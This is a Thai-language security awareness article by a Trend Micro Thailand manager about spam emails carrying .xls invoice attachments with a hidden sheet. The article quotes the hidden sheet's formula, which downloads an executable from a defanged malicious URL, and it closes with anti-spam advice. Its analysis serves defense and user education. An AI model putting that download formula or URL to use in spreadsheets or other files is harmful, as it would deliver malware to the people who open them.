THE GURU • Cyber Security

ระวังภัยคุกคามที่แอบซ่อนตัวอยู่ในไฟล์ Excel

บทความโดย: ปิยธิดา ตันตระกูล


ช่วงนี้ต้องระวังกันสักนิดนะคะ เพราะมีขบวนการสแปมที่ใช้อีเมล์แนบไฟล์เอ็กเซล (สกุล .xls) ซึ่งทางเทรนด์ไมโครได้ตรวจจับมัลแวร์ได้ในชื่อ Trojan.XF.HIDDBOOK.THDBHBO นั้น กำลังแพร่กระจายและเจาะกลุ่มเป้าหมาย ทั้งในประเทศอิตาลีและบางส่วนในเยอรมนี รวมไปถึงประเทศอื่นด้วย ไฟล์แนบดังกล่าวเมื่อเปิดขึ้นมาแล้วจะดูเหมือนไฟล์ที่ว่างเปล่า แต่จริงๆ แล้วมีชีทที่ “ซ่อน” อยู่ ที่พยายามเชื่อมต่อกับ URL เพื่อดาวน์โหลดไฟล์ ซึ่งการซ่อนชีทเอกสารนี้เป็นฟีเจอร์ที่สำคัญในเอ็กเซล 

จากตัวอย่างของสแปมเมล์บางส่วนจะเขียนหัวข้อเมล์เป็นภาษาอิตาลีในทำนองว่า บริการฟรี, ขอแก้ไขข้อมูล, รายละเอียดใบแจ้งหนี้, การดำเนินการสั่งซื้อ, และการให้ความช่วยเหลือในการบริการ จากภาพตัวอย่างด้านล่างจะเป็นการแจ้งให้ผู้รับกรอกรายละเอียดคำสั่งซื้อให้สมบูรณ์ พร้อมทั้งแนบไฟล์ชื่อ “fattura_10.xls” ซึ่งคำว่า Fattura เป็นภาษาอิตาลีแปลว่าใบแจ้งหนี้

 



 ตัวอย่างอีเมล์ภาษาอิตาลีที่ใช้กระจายไฟล์แนบสกุล .xls ที่มีชีทที่ถูกซ่อนอยู่

 เมื่อดาวน์โหลดและเปิดไฟล์แนบแล้ว จะมีหน้าต่างขึ้นมาขอให้ “เปิดการใช้งานคอนเท็นต์” ซึ่งเมื่อมองแวบแรกจะเหมือนไฟล์เอ็กเซลนี้ว่างเปล่า แต่เมื่อกดเปิดอนุญาตใช้งานแล้ว ไฟล์นี้จะพยายามเชื่อมต่อไปยัง URL เพื่อดาวน์โหลดอีกไฟล์หนึ่งผ่านทางสูตร “=FORMULA(“hxxp://gstat.dondyablo[.]com/fattura.exe”, $BB$54” โดยมีข้อสังเกตว่าชีทที่ซ่อนอยู่นั้นจะยังไม่โผล่ออกมาให้เห็นแม้กดอนุญาตให้แสดงเนื้อหาแล้วก็ตาม

เราสามารถปลดการซ่อนชีทที่ซ่อนอยู่ออกมาได้ด้วยตัวเอง เนื่องจากแค่ถูกตั้งค่าให้ซ่อนไว้แบบธรรมดา ไม่ได้ถึงกับเป็นแบบ “Very Hidden” ซึ่งชีทแบบซ่อนระดับสูงนี้จะไม่สามารถเข้าถึงได้ผ่านอินเทอร์เฟซของโปรแกรมเอ็กเซลทั่วไป ต้องใช้ทูลพิเศษเปิดออกมาอีกทีหนึ่ง กลับมาที่ชีทที่ซ่อนและสูตรในไฟล์แนบนี้ที่สามารถนำไปใช้ดาวน์โหลดไฟล์อันตราย ไปจนถึงการเชื่อมต่อกับโดเมนต้องสงสัย ที่เปิดช่องให้ผู้ไม่ประสงค์ดีเข้ามาโจมตีได้

ก่อนหน้านี้ไม่นาน เราก็เคยพบกับขบวนการที่คล้ายถึงกัน ที่ใช้ชีทบน Microsoft Excel 4.0 ที่ใช้มาโคร ที่มีสูตรที่น่าสงสัยที่ถูกตั้งค่าไว้เป็น “Very hidden” ที่แพร่กระจายตัวเองผ่านสแปมเมลด้วย

 

การป้องกันตัวเองจากสแปม

            สแปมเมล์ถือเป็นช่องทางหนึ่งที่อาชญากรไซเบอร์ใช้ในการแพร่กระจายไฟล์อันตราย ซึ่งผู้ใช้สามารถป้องกันอันตรายเหล่านี้ได้โดยปฎิบัติตามแนวทางดังต่อไปนี้

1. พิจารณาก่อนเสมอเวลาดาวน์โหลดไฟล์แนบ หรือคลิกลิงค์ที่มากับอีเมล์ที่มาจากแหล่งที่ไม่คุ้นเคย ควรเอาเมาส์ไปอยู่บนลิงค์เพื่อเช็ค URL ก่อนเสมอ

2. ตรวจสอบที่อยู่อีเมล์ของผู้ส่ง ถ้าไม่คุ้นเคยหรือไม่ได้โยงไปถึงองค์กรที่มีชื่อเสียงแล้ว ก็ควรหลีกเลี่ยงที่จะทำอะไรกับอีเมล์ดังกล่าว

3. คอยสังเกตความผิดพลาดทางไวยากรณ์หรือการสะกดคำผิดในเนื้อหาอีเมล์ เนื่องจากอีเมล์ที่มาจากบริษัทที่เป็นทางการมักระวังในการใช้ภาษาอยู่แล้ว

4. เก็บข้อมูลที่อยู่อีเมล์และข้อมูลส่วนบุคคลของตัวเองให้เป็นความลับ เพื่อลดโอกาสที่จะได้รับสแปมเมล์

            วิธีการเหล่านี้ก็จะสามารถช่วยให้คุณป้องกันตนเองได้ในระดับหนึ่งเลยทีเดียวค่ะ 

เกี่ยวกับนักเขียน

ปิยธิดา ตันตระกูล ผู้จัดการประจำประเทศไทย บริษัท เทรนด์ ไมโคร (ประเทศไทย)

อ่านบทความทั้งหมดของนักเขียน